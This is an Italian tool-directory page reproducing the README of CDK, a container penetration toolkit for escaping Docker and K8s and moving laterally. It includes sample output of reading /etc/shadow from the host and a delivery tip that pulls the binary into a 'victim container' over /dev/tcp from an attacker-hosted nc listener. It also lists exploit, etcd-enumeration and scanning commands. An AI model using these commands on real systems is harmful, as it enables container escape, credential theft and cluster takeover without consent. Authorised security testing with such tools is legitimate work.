Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CDK — 📦 Rendi più facile il test di sicurezza di K8s, Docker e Containerd. | Kitploit
Strumenti/GitHubGitHub/cdk-team/cdk
Escalation di PrivilegiRicognizioneSicurezza dei ContenitoriMeccanismi di PersistenzaExploitMovimento LateralePost-ExploitPenetration TestingSicurezza CloudEscape dal ContainerTop in Escape dal Container n.2
4.7k606655 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubcdk-team/cdk

CDK

📦 Rendi più facile il test di sicurezza di K8s, Docker e Containerd.

Vedi RepositorySito web

CDK - Toolkit di Penetrazione per Container a Zero Dipendenze

Inglese | 简体中文

png

Dichiarazione di non responsabilità legale

L'uso di CDK per attaccare bersagli senza previo consenso reciproco è illegale. CDK è destinato esclusivamente a scopi di test di sicurezza.

Panoramica

CDK è un toolkit di penetrazione per container open-source, progettato per offrire sfruttamento stabile in diversi container snelli senza alcuna dipendenza dal sistema operativo. Viene fornito con utili net-tools e molti potenti PoC/EXP e ti aiuta a fuggire dal container e a prendere il controllo del cluster K8s facilmente.

Avvio rapido

Esegui cdk eva per ottenere informazioni di valutazione e un exploit raccomandato, quindi esegui cdk run per avviare l'attacco.

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Installazione/Consegna

Scarica l'ultima release da https://github.com/cdk-team/CDK/releases/

Inserisci i file eseguibili nel container di destinazione e inizia i test.

SUGGERIMENTI: Consegnare CDK nel container di destinazione in un test di penetrazione reale

Se hai un exploit che può caricare un file, allora puoi caricare direttamente il binario di CDK.

Se hai un exploit RCE, ma il container di destinazione non ha curl o wget, puoi utilizzare il seguente metodo per consegnare CDK:

  1. First, host CDK binary on your host with public IP.
(on your host)
nc -lvp 999 < cdk
  1. Inside the victim container execute
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Utilizzo

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

Caratteristiche

CDK ha tre moduli:

  1. Valutazione: raccogli informazioni all'interno del container per trovare potenziali debolezze.
  2. Exploit: per fuga dal container, persistenza e movimento laterale
  3. Strumenti: net-tools e API per richieste TCP/HTTP, tunnel e gestione del cluster K8s.

Modulo di Valutazione

Utilizzo

cdk evaluate [--full]
TatticheScriptSupportatoUtilizzo/Esempio
Raccolta InformazioniInformazioni Base del SO✔link
Raccolta InformazioniCapacità Disponibili✔link
Raccolta InformazioniComandi Linux Disponibili✔link
Raccolta InformazioniMount✔link
Raccolta InformazioniNamespace di Rete✔link
Raccolta InformazioniENV Sensibili✔link
Raccolta InformazioniProcessi Sensibili✔link
Raccolta InformazioniFile Locali Sensibili✔link
Raccolta InformazioniKube-proxy Route Localnet (CVE-2020-8558)✔link
Raccolta InformazioniScoperta Servizi Basata su DNS✔link
ScopertaInformazioni API Server K8s✔link
ScopertaInformazioni Service Account K8s✔link
ScopertaAPI Metadata del Provider Cloud✔link

Modulo Exploit

Elenca tutti gli exploit disponibili:

cdk run --list

Esegui exploit mirato:

cdk run <script-name> [options]
Scarica lo strumento